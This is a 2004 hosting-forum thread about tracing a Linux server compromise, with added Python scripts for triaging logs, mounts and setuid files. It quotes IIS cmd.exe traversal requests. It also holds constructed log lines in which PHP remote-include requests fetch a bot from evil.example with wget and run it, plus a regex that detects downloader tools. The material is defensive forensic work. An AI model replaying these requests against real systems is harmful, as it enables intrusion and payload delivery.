-
08-06-2004, 01:34 PM #1 (Web Hosting Guru)
Join Date: Apr 2004 | Location: India | Posts: 292
I need to find the entry point of a hacker into my server!! Security experts, can you help me?
Hello All,
I have a compromised server... I have posted a query for the same...
Now my logwatch says this :
My xferlogs are saying:
--------------------- ftpd-xferlog Begin ------------------------
TOTAL KB IN: 119KB (0MB)
---------------------- ftpd-xferlog End --------
It seems that somebody uploaded something... as little as 119 KB? Serious looking!!!
IMAPd Logout stats:
====================
User | Logouts | Downloaded | Mbox Size
--------------------------------------- | ------- | ---------- | ----------
??? domain=??? | 161 | |
beth@pachak.com domain=pachak.com | 2 | |
jlong domain=s3tech.net | 3 | |
joel domain=swspeed.com | 12 | |
westerman@aknb.org domain=aknb.org | 3 | |
----------------------------------------------------------------------------
181 | 0 | 0
**Unmatched Entries**
Connection timed out, while reading line user=david@devianconsult.com host=pcp03161084pcs.parads01.nm.comcast.net [68.35.41.63]: 1 Time(s)
Connection timed out, while reading line user=david@pachak.com host=pcp03161084pcs.parads01.nm.comcast.net [68.35.41.63]: 1 Time(s)
Logout user=??? domain=??? host=UNKNOWN: 12 Time(s)
So many dropped packets:
--------------------- Kernel Begin ------------------------
Dropped 56 packets on interface eth0
From 61.110.238.96 - 5 packets to tcp(17300,17300,17300,17300,17300)
From 64.179.97.193 - 3 packets to tcp(2745)
From 69.39.92.168 - 3 packets to tcp(2745)
From 69.91.24.102 - 9 packets to tcp(1025,2745,6129)
From 69.137.65.77 - 3 packets to tcp(2745)
From 69.144.221.228 - 6 packets to tcp(1025,2745,6129)
From 69.167.198.187 - 4 packets to tcp(1025,2745,6129)
From 213.236.248.149 - 10 packets to tcp(4561,44464,4561,44464,4561,44464,4561,44464,4561,44464)
From 218.89.104.161 - 3 packets to tcp(5554,5554,9898)
From 221.143.42.23 - 10 packets to udp(1026,1026,1026,1026,1026)
Logged 10 packets on interface eth0
From 61.11.23.142 - 6 packets to tcp(22)
From 69.240.64.97 - 4 packets to tcp(22)
---------------------- Kernel End -------------------------
pam_unix says:
Unknown Entries:
2 more authentication failures; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=pcp09766260pcs.albqrq01.nm.comcast.net user=admin: 1 Time(s)
-------------------------------------------------
VERY SERIOUS LINE:
PAM-listfile: Couldn't open /etc/ftpusers
hosting.hidefweb.com (bgp01383292bgs.montbl01.nm.comcast.net[68.35.140.209]) - PAM(ryan@swspeed.com): User not known to the underlying authentication module.
-----------------------------------------------------
Now see some entries in access_log :
root@hosting [~]# cat /usr/local/apache/logs/access_log | grep -i "/../"
141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
208.41.103.26 - - [27/Jul/2004:18:14:09 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -
208.41.103.26 - - [27/Jul/2004:18:18:14 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -
208.41.103.26 - - [27/Jul/2004:18:21:11 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -
208.41.103.26 - - [27/Jul/2004:18:24:04 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -
Security experts, can you help me find what the entry point is? What must have gone wrong?
What should I do?
Any suggestion?
thelinophile
Thinking Different !!
-
08-06-2004, 01:56 PM #2 (Problem Solver)
Join Date: Mar 2003 | Location: California USA | Posts: 13,681
Those are entry points for IIS, not Linux.
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
08-06-2004, 01:58 PM #3 (Web Hosting Guru)
Join Date: Mar 2003 | Location: Rio de Janeiro - Brazil | Posts: 291
Re: I need to find the entry point of a hacker into my server!! Security experts, can you help me?
Originally posted by atul
Security experts, can you help me?
-
08-06-2004, 01:59 PM #4 (Web Hosting Guru)
Join Date: Mar 2003 | Location: Rio de Janeiro - Brazil | Posts: 291
Oops..., he replied first.
-
08-06-2004, 02:00 PM #5 (Problem Solver)
Join Date: Mar 2003 | Location: California USA | Posts: 13,681
cd /usr/local/apache/domlogs
grep wget *
-
08-06-2004, 02:28 PM #6 (Web Hosting Master)
Join Date: Dec 2001 | Posts: 5,221
Greetings:
How do you know your server is compromised?
The command Steve wrote about will show if the hacker got in via Apache/PHP/Perl CGI, etc. using wget off of your server.
Properly configured, mod_security from http://www.modsecurity.org/ will protect against such attacks; another good layer is to disable wget and similar programs, along with your compilers, for everyone except root.
You may also want to review /var/log/secure and /var/log/messages.
Thank you.
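A worked version of the triage that Steve's grep does, added here and not part of the thread: it parses Apache access-log lines, URL-decodes the request, separates the IIS and Cisco IOS scanner noise quoted in the first post from requests that could actually have executed something on a Linux host (a URL passed as a parameter, the PHP remote-include shape, or wget/curl/fetch inside the query), and only counts requests the server actually served. The log lines are constructed: the first two mirror the shapes seen in the thread, and the evil.example hits are invented to show what a real PHP entry point looks like in the log.

```python
"""Triage Apache access-log lines for a suspected PHP entry point.

Added example, not code from the thread.  SAMPLE_LOG is constructed: the
first two lines copy the request shapes posted in the thread, the
evil.example lines are invented to show a real PHP remote-include hit.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

SAMPLE_LOG = """\
208.41.103.26 - - [27/Jul/2004:18:14:09 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -
141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
10.0.0.7 - - [05/Aug/2004:02:11:40 -0600] "GET /index.php?page=http://evil.example/cmd.txt?&cmd=cd%20/var/tmp;wget%20http://evil.example/iroffer.tar HTTP/1.1" 200 812
10.0.0.7 - - [05/Aug/2004:02:11:52 -0600] "GET /index.php?page=http://evil.example/cmd.txt?&cmd=tar%20xf%20iroffer.tar;cd%20ls;./iroffer HTTP/1.1" 200 640
192.0.2.9 - - [05/Aug/2004:03:00:01 -0600] "GET /index.php HTTP/1.1" 200 4122
"""

# Common/combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, size.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Strings that only make sense against Microsoft IIS (cmd.exe traversal via
# %e0%80%af, an overlong UTF-8 encoding of "/", MSADC, FrontPage extensions).
IIS_MARKERS = ("cmd.exe", "/winnt/", "/msadc/", "/scripts/", "root.exe", "/_vti_bin/")
# "/level/NN/exec/..." probes target the HTTP server in Cisco IOS, not Apache.
CISCO_RE = re.compile(r"/level/\d+/exec/")
# Tools an attacker uses to pull a payload onto a Unix host through a web hole.
DOWNLOADER_RE = re.compile(r"(?<![\w./-])(wget|curl|fetch|lynx|links)(?![\w-])")
# A parameter whose value is a URL is the classic PHP remote-file-include shape.
REMOTE_INCLUDE_RE = re.compile(r"[?&][^=&]+=(https?|ftp)://", re.I)


def classify(line):
    """Parse one log line and tag it; returns None for lines that do not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    decoded = unquote(m.group("target"), errors="replace")
    low = decoded.lower()
    tags = []
    if any(marker in low for marker in IIS_MARKERS):
        tags.append("iis-noise")
    if CISCO_RE.search(low):
        tags.append("cisco-ios-noise")
    if REMOTE_INCLUDE_RE.search(decoded):
        tags.append("remote-include")
    if DOWNLOADER_RE.search(decoded):
        tags.append("downloader")
    status = int(m.group("status"))
    return {
        "ip": m.group("ip"), "ts": m.group("ts"), "target": decoded,
        "status": status, "tags": tags,
        # A 4xx/5xx never reached a script; only served requests could have run anything here.
        "served": status < 400,
    }


def triage(text):
    """All tagged records, in log order."""
    hits = []
    for raw in text.splitlines():
        rec = classify(raw)
        if rec and rec["tags"]:
            hits.append(rec)
    return hits


def likely_entry_points(hits):
    """Served requests carrying a remote include or a downloader, grouped by client IP."""
    by_ip = defaultdict(list)
    for rec in hits:
        if rec["served"] and {"remote-include", "downloader"} & set(rec["tags"]):
            by_ip[rec["ip"]].append(rec)
    return dict(by_ip)


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for rec in hits:
        print(rec["ip"], rec["status"], ",".join(rec["tags"]), rec["target"][:70])
    for ip, recs in likely_entry_points(hits).items():
        print(f"probable entry point from {ip}: {len(recs)} served request(s)")
```

Run it over the real domlogs with `triage(open(path).read())`; the 404/400 scanner hits drop out of `likely_entry_points` on their own, and what remains is the handful of 200s with a URL or a downloader in the query, which is exactly the line a grep for wget finds, plus the remote-include hits that grep misses.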
-
08-06-2004, 02:44 PM #7 (Web Hosting Guru)
Join Date: Apr 2004 | Location: India | Posts: 292
Hello dynamiscnt,
Please look at this:
root@hosting [/var/tmp/ls]# ls
./ dynip.sh* iroffer.tar mybot.ignl.bkup mybot.xdcc README x.xdcc
../ iroffer* Makefile mybot.log mybot.xdcc.bkup sample.config
Configure* iroffer_chroot* Makefile.config mybot.log.2004-w28 mybot.xdcc.txt src/
COPYING iroffer.cron* mybot.ignl mybot.msg obj/ WHATSNEW
These were present, but I deleted these..
And Mr. Security, how can you say that those are entry points of IIS and not of Linux..? I have RHE3 on the server... and that server is hacked...
How can I check what the damage is?
-
08-06-2004, 03:17 PM #8 (Web Hosting Master)
Join Date: Dec 2001 | Posts: 5,221
Greetings:
The log entries you posted deal with attacks geared against IIS, not Linux. That's probably why Steve pointed out those particular log entries mean zero as it relates to your system and a compromise on your system.
I take it /tmp was not secured (nosuid, noexec). Correct?
Did you check through your Apache access log files searching for "wget" as Steve suggested?
Thank you.
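The nosuid/noexec question above applies to whichever filesystem actually holds the directory, and the bot in this thread sat in /var/tmp, which on many layouts lives on /var or on the root filesystem rather than on a hardened /tmp. Added example, not from the thread: it resolves each temp directory to its mount point and reports the options that are missing there. The mount table is constructed; on a live box feed it `open("/proc/mounts").read()`.

```python
"""Check that temp directories sit on mounts carrying nosuid/noexec/nodev.

Added example, not from the thread.  SAMPLE_MOUNTS is a constructed
/proc/mounts: /tmp is a hardened mount, /var/tmp is merely a directory on /var.
"""

SAMPLE_MOUNTS = """\
/dev/sda2 / ext3 rw 0 0
/dev/sda5 /tmp ext3 rw,nosuid,noexec,nodev 0 0
/dev/sda6 /var ext3 rw 0 0
proc /proc proc rw 0 0
"""

# Directories any local user (and therefore any web-server-owned process) can write to.
WANTED = {
    "/tmp": {"nosuid", "noexec", "nodev"},
    "/var/tmp": {"nosuid", "noexec", "nodev"},
    "/dev/shm": {"nosuid", "noexec", "nodev"},
}


def parse_mounts(text):
    """Map mount point -> set of mount options from /proc/mounts-style lines."""
    mounts = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 4:
            mounts[fields[1]] = set(fields[3].split(","))
    return mounts


def mount_point_for(path, mounts):
    """Longest mount point that is a prefix of path (the path itself need not exist)."""
    best = "/"
    for mp in mounts:
        if mp != "/" and (path == mp or path.startswith(mp + "/")) and len(mp) > len(best):
            best = mp
    return best


def check_temp_dirs(text):
    """Map directory -> (mount point it lives on, sorted list of missing options)."""
    mounts = parse_mounts(text)
    report = {}
    for path, needed in WANTED.items():
        mp = mount_point_for(path, mounts)
        report[path] = (mp, sorted(needed - mounts.get(mp, set())))
    return report


if __name__ == "__main__":
    for path, (mp, missing) in check_temp_dirs(SAMPLE_MOUNTS).items():
        state = "ok" if not missing else "missing " + ",".join(missing)
        print(f"{path:10} on {mp:6} {state}")
```

Two caveats a practitioner should keep in mind: the check only says what the mount flags are, and noexec is not a hard barrier, since a binary can still be started through the dynamic loader or a script through its interpreter. It buys time and breaks lazy kits like the one in this thread; it does not replace fixing the PHP hole.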
-
08-06-2004, 03:29 PM #9 (Web Hosting Guru)
Join Date: Apr 2004 | Location: India | Posts: 292
Hello,
Did you see my logwatch, which I posted along with the access_log that you say is an IIS attack!!
NO, /tmp is already secured.. I mean before the attack!! and also quotas are enabled on it!!!
Please, can you analyse the logwatch, like the dropped packets, or this:
2 more authentication failures; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=pcp09766260pcs.albqrq01.nm.comcast.net user=admin: 1 Time(s)
and this, VERY SERIOUS:
PAM-listfile: Couldn't open /etc/ftpusers
hosting.hidefweb.com (bgp01383292bgs.montbl01.nm.comcast.net[68.35.140.209]) - PAM(ryan@swspeed.com): User not known to the underlying authentication module.
I think you haven't seen these!! I think they are serious and may help me to trace the entry point!!!
What do you suggest??
-
08-06-2004, 03:38 PM #10 (Problem Solver)
Join Date: Mar 2003 | Location: California USA | Posts: 13,681
Atul, none of that is related to the attack you were given. IIS is a Windows product, not a Linux product; that is why I mentioned that it means nothing, since you are on Linux, aka Red Hat.
Those logwatch entries are a daily thing. You've got to learn to live with them.
Check out: http://rfxnetworks.com/bfd.php
Those scripts in your /var/tmp are not "harmful"; they are bad, but they will not compromise the root of the server. They are simply an IRC bot used to distribute files through DCC, also known as an XDCC bot.
Your entry point was probably a PHP script, which has been mentioned to you many times in many posts, but you seem to be ignoring them.
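Added example, not from the thread: it parses the kernel section of the logwatch report quoted in the first post, checks the per-source counts against the headline totals, and separates ports this Linux host does not serve from the two sources that were knocking on SSH (tcp/22), which is the kind of traffic the BFD script linked above is built to act on. The port labels are my own annotation of what those ports were commonly hit for in 2004, and the set of services the host exposes is an assumption.

```python
"""Summarise the "Dropped/Logged packets" section of a logwatch kernel report.

Added example, not from the thread.  LOGWATCH_KERNEL is the section as posted;
the port annotations and SERVICES_ON_THIS_HOST are assumptions added here.
"""
import re
from collections import Counter, defaultdict

LOGWATCH_KERNEL = """\
Dropped 56 packets on interface eth0
From 61.110.238.96 - 5 packets to tcp(17300,17300,17300,17300,17300)
From 64.179.97.193 - 3 packets to tcp(2745)
From 69.39.92.168 - 3 packets to tcp(2745)
From 69.91.24.102 - 9 packets to tcp(1025,2745,6129)
From 69.137.65.77 - 3 packets to tcp(2745)
From 69.144.221.228 - 6 packets to tcp(1025,2745,6129)
From 69.167.198.187 - 4 packets to tcp(1025,2745,6129)
From 213.236.248.149 - 10 packets to tcp(4561,44464,4561,44464,4561,44464,4561,44464,4561,44464)
From 218.89.104.161 - 3 packets to tcp(5554,5554,9898)
From 221.143.42.23 - 10 packets to udp(1026,1026,1026,1026,1026)
Logged 10 packets on interface eth0
From 61.11.23.142 - 6 packets to tcp(22)
From 69.240.64.97 - 4 packets to tcp(22)
"""

HEADER_RE = re.compile(r"^(Dropped|Logged) (\d+) packets on interface (\S+)")
SOURCE_RE = re.compile(r"^From (\S+) - (\d+) packets to (tcp|udp)\(([\d,]+)\)")

# Annotation added here: ports that in 2004 were overwhelmingly hit by Windows
# worms and their backdoors.  Background noise for a Linux web server.
WINDOWS_NOISE_PORTS = {
    ("tcp", 1025): "Windows RPC", ("tcp", 2745): "Bagle backdoor",
    ("tcp", 5554): "Sasser FTP server", ("tcp", 6129): "DameWare",
    ("tcp", 9898): "Dabber backdoor", ("tcp", 17300): "Kuang2 trojan",
    ("udp", 1026): "Windows Messenger spam",
}
# Assumption: services this host really exposes; hits here deserve attention.
SERVICES_ON_THIS_HOST = {("tcp", 22): "ssh"}


def parse_kernel_section(text):
    """List of {action, claimed, iface, sources}; the port list is de-duplicated."""
    records, current = [], None
    for line in text.splitlines():
        h = HEADER_RE.match(line)
        if h:
            current = {"action": h.group(1), "claimed": int(h.group(2)),
                       "iface": h.group(3), "sources": []}
            records.append(current)
            continue
        s = SOURCE_RE.match(line)
        if s and current is not None:
            ports = sorted({int(p) for p in s.group(4).split(",")})
            current["sources"].append({"ip": s.group(1), "count": int(s.group(2)),
                                       "proto": s.group(3), "ports": ports})
    return records


def totals_match(records):
    """True when the per-source counts add up to each section's headline number."""
    return all(sum(src["count"] for src in r["sources"]) == r["claimed"] for r in records)


def classify_sources(records):
    """(Counter of noise labels by number of sources, {ip: packets} for real services)."""
    noise, relevant = Counter(), defaultdict(int)
    for r in records:
        for src in r["sources"]:
            for port in src["ports"]:
                key = (src["proto"], port)
                if key in SERVICES_ON_THIS_HOST:
                    relevant[src["ip"]] += src["count"]
                else:
                    noise[WINDOWS_NOISE_PORTS.get(key, f"{key[0]}/{key[1]}")] += 1
    return noise, dict(relevant)


if __name__ == "__main__":
    recs = parse_kernel_section(LOGWATCH_KERNEL)
    print("totals consistent:", totals_match(recs))
    noise, relevant = classify_sources(recs)
    for label, n in noise.most_common():
        print(f"noise  {label:25} {n} source(s)")
    for ip, n in relevant.items():
        print(f"watch  {ip:16} {n} packets at ssh")
```

Everything under "Dropped" here is scan traffic aimed at ports this box does not serve; the only lines that touch a real service are the two SSH sources, and those belong in a brute-force detector with a threshold and an automatic firewall rule, not in a manual hunt for an entry point.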
-
08-06-2004, 03:59 PM #11 (Web Hosting Guru)
Join Date: Apr 2004 | Location: India | Posts: 292
Hello Mr. Security,
I am very sorry if I said anything abrupt!!!
I didn't have any idea whether those logwatch entries were safe to believe!!
Thanks for it!!
Yes, I know you have mentioned that the entry point is a PHP script..
and I have enabled safe mode in php.ini and also disabled functions such as those mentioned...
So PHP is already installed on the server!!! What can I do for it?
Is there any way to find it?
This is one more thing I wanted to show you, about SUID scripts:
SUID and SGID files found: ( find / \( -perm -004000 -o -perm -002000 \) -type f -print )
/home/invictus/public_html/postinfo.html
/home/invictus/public_html/.htaccess
/home/invictus/public_html/_vti_inf.html
/home/invictus/public_html/auth.php
/home/invictus/public_html/backend.php
/home/invictus/public_html/banners.php
/home/invictus/public_html/footer.php
/home/invictus/public_html/header.php
/home/invictus/public_html/index.php
/home/invictus/public_html/mainfile.php
/home/invictus/public_html/modules.php
/home/invictus/public_html/robots.txt
/home/invictus/public_html/ultramode.txt
/home/invictus/public_html/config.~php
find: /proc/27624/fd/4: No such file or directory
find: /proc/27624/fd/4: No such file or directory
/usr/sbin/usernetctl
/usr/sbin/utempter
/usr/sbin/exim
/usr/sbin/suexec
/usr/sbin/sendmail
/usr/sbin/gnome-pty-helper
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/wall
/usr/bin/passwd
/usr/bin/at
/usr/bin/quota
/usr/bin/crontab
/usr/bin/lppasswd
/usr/libexec/openssh/ssh-keysign
/usr/local/urchin/bin/urchind
/usr/local/urchin/util/geo-update
/usr/local/urchin/util/u3importer
/usr/local/urchin/util/uconf-driver
/usr/local/urchin/util/uconf-export
/usr/local/urchin/util/uconf-import
/usr/local/urchin/util/uconf-schedule
/usr/local/urchin/util/udb-sanitizer
/usr/local/apache/bin/suexec
/usr/local/cpanel/bin/cpwrap
/usr/local/cpanel/bin/jailshell
/usr/local/cpanel/3rdparty/mailman/mail/mailman
/usr/local/cpanel/3rdparty/mailman/cgi-bin/admindb
/usr/local/cpanel/3rdparty/mailman/cgi-bin/admin
/usr/local/cpanel/3rdparty/mailman/cgi-bin/confirm
/usr/local/cpanel/3rdparty/mailman/cgi-bin/edithtml
/usr/local/cpanel/3rdparty/mailman/cgi-bin/listinfo
/usr/local/cpanel/3rdparty/mailman/cgi-bin/options
/usr/local/cpanel/3rdparty/mailman/cgi-bin/private
/usr/local/cpanel/3rdparty/mailman/cgi-bin/rmlist
/usr/local/cpanel/3rdparty/mailman/cgi-bin/roster
/usr/local/cpanel/3rdparty/mailman/cgi-bin/subscribe
/usr/local/cpanel/cgi-sys/scgiwrap
/bin/su
/sbin/pam_timestamp_check
/sbin/pwdb_chkpwd
/sbin/unix_chkpwd
/sbin/netreport
I had already disabled wget (set it to 700) before the attack..
Do you see anything false in that list?
Thank you, Mr. Security!! I have all faith in you!!
Thanks again!!
-
08-06-2004, 04:10 PM #12 (Retired Moderator)
Join Date: Jul 2001 | Location: Singapore | Posts: 1,889
FYI, to check or monitor for s[ug]id files... use sXid, which is good:
http://freshmeat.net/projects/sxid/
Giam Teck Choon
:: Join choon.net Community today to share your tips and tricks on server issues please ::
:: Singapore Dedicated Servers :: Singapore Virtual Private Servers :: Linux/FreeBSD Server Management ::
-
08-06-2004, 04:54 PM #13 (Web Hosting Guru)
Join Date: Apr 2004 | Location: India | Posts: 292
Hello All,
The sXid logs say this:
I think, according to Mr. Security, some PHP script is the problem.
I think it could be one of them:
#sxid
/home/invictus/public_html/config.~php^^32039^^32040^^36863^^1618916^^e417e7c1f4d43bd60f4d3fe5e4c3d32d
/home/invictus/public_html/ultramode.txt^^32039^^32040^^36863^^1618914^^bdbb17421e5d5f4c24b611e86ade522e
/home/invictus/public_html/robots.txt^^32039^^32040^^36863^^1618913^^089023af5da43c852e4d4d59c0ec3a9e
/home/invictus/public_html/modules.php^^32039^^32040^^36863^^1618912^^41c871826e334e9470422adf665e1f81
/home/invictus/public_html/mainfile.php^^32039^^32040^^36863^^1618911^^aefa54854aeb1000e897133a672c3199
/home/invictus/public_html/index.php^^32039^^32040^^36863^^1618910^^e49bff767016bc21d2dcabfd799b358d
/home/invictus/public_html/header.php^^32039^^32040^^36863^^1618908^^218bd1bac6599961d5727b9b744ec92d
/home/invictus/public_html/footer.php^^32039^^32040^^36863^^1618907^^cdf7efd8e351ef1e5bb560d73abbbc0d
/home/invictus/public_html/banners.php^^32039^^32040^^36863^^1618905^^748fa745809248efd600ca7c313ac6d4
/home/invictus/public_html/backend.php^^32039^^32040^^36863^^1618904^^b731b8db128bcda3b36a1c0cdbf0fe7d
/home/invictus/public_html/auth.php^^32039^^32040^^36863^^1618903^^624b56edae07c3f407facee7aaf6eafe
/home/invictus/public_html/_vti_inf.html^^32039^^32040^^36863^^1618902^^5721e16914007736f8611fdd96ef0723
/home/invictus/public_html/.htaccess^^32039^^32040^^36863^^1618899^^76eed586c54af24744ed41a3597d0afe
/home/invictus/public_html/postinfo.html^^32039^^32040^^36863^^1618900^^1ccbd6660460154debbd1c011290722
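Added example, not sXid's own code, that reads records in the shape posted above and decodes them. The field layout is an inference from those records and is an assumption: path ^^ uid ^^ gid ^^ mode ^^ inode ^^ md5. Under that reading the fourth field, 36863, is 0107777 in octal, a regular file with the setuid, setgid and sticky bits set and permissions 777, which is why the find -perm run listed the same paths. The kernel never honours setuid on a script, and Apache's PHP module only reads these files, so the bits grant nothing by themselves; the 777 is the part worth fixing, and a root-owned setuid binary outside the package baseline is what a real root compromise tends to leave behind. The /bin/su and /usr/local/bin/sh records, including their hashes, are constructed.

```python
"""Decode sXid-style SUID/SGID records and flag the ones worth chasing.

Added example, not sXid's own code.  Field order (path^^uid^^gid^^mode^^inode^^md5)
is inferred from the posted records.  The first two records are copied from
the thread; the /bin/su and /usr/local/bin/sh records and hashes are constructed.
"""
import stat

SXID_RECORDS = """\
/home/invictus/public_html/index.php^^32039^^32040^^36863^^1618910^^e49bff767016bc21d2dcabfd799b358d
/home/invictus/public_html/modules.php^^32039^^32040^^36863^^1618912^^41c871826e334e9470422adf665e1f81
/bin/su^^0^^0^^35309^^131091^^0123456789abcdef0123456789abcdef
/usr/local/bin/sh^^0^^0^^35309^^131099^^fedcba9876543210fedcba9876543210
"""

# Root-owned setuid binaries you expect on the box.  In practice derive this
# from the package manager (rpm -qf / rpm -V) rather than typing it in.
BASELINE = {"/bin/su"}


def parse_record(line):
    """Split one record into its fields (field order is an assumption, see above)."""
    path, uid, gid, mode, inode, md5 = line.split("^^")
    return {"path": path, "uid": int(uid), "gid": int(gid),
            "mode": int(mode), "inode": int(inode), "md5": md5}


def describe_mode(mode):
    """Return (octal string, list of special bits, ls-style mode string)."""
    special = [name for bit, name in ((stat.S_ISUID, "setuid"),
                                      (stat.S_ISGID, "setgid"),
                                      (stat.S_ISVTX, "sticky")) if mode & bit]
    return f"{mode:o}", special, stat.filemode(mode)


def assess(rec):
    """Findings for one record; an empty list means nothing to chase."""
    mode, path = rec["mode"], rec["path"]
    findings = []
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    if path.startswith("/home/") and mode & (stat.S_ISUID | stat.S_ISGID):
        # Setuid/setgid on scripts or on files Apache merely reads has no effect;
        # it is a sloppy chmod 7777 or a sign something rewrote the files.
        findings.append("setuid/setgid on web content (no effect, but explain the chmod)")
    if rec["uid"] == 0 and mode & stat.S_ISUID and path not in BASELINE:
        findings.append("root setuid binary outside baseline: verify with the package manager")
    return findings


def audit(text):
    """Map path -> findings for every non-empty record in text."""
    return {rec["path"]: assess(rec)
            for rec in (parse_record(l) for l in text.splitlines() if l.strip())}


if __name__ == "__main__":
    for line in SXID_RECORDS.splitlines():
        rec = parse_record(line)
        octal, special, ls = describe_mode(rec["mode"])
        print(f"{rec['path']:42} {octal} {ls} {','.join(special):20} uid={rec['uid']}")
        for f in assess(rec):
            print(f"    -> {f}")
```

The inode and md5 columns are what make a tool like sXid useful day to day: keep the previous run's records and diff them, so a new root-owned setuid file, or a changed hash on an existing one, shows up the morning after it appears rather than weeks later.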
-
08-06-2004, 06:46 PM #14 (Problem Solver)
Join Date: Mar 2003 | Location: California USA | Posts: 13,681
That's no problem ^^
-
08-06-2004, 06:55 PM #15 (Web Hosting Guru)
Join Date: Apr 2004 | Location: India | Posts: 292
Hello Mr. Security,
May I know how you can say that? These are the only PHP SUID scripts found to be doubtful!!!
What does that output mean? Can you please explain in brief?
Where and how should I look for a false .php script? How should I check the damage that happened to the system?
Thanks once again!
-
08-06-2004, 07:06 PM #16 (Web Hosting Master)
Join Date: Dec 2001 | Posts: 5,221
Greetings:
Did you check through your Apache access log files searching for "wget" as Steve suggested?
Thank you.
-
08-06-2004, 07:35 PM #17 (Web Hosting Master)
Join Date: Apr 2003 | Location: NC | Posts: 3,093
If you want help, you are going to have to listen to what others have said... the wget thing is a very common entry method and the first thing to check.
John W, CISSP, C|EH
MS Information Security and Assurance
ITEagleEye.com - Server Administration and Security
Yawig.com - Managed VPS and Dedicated Servers with VIP Service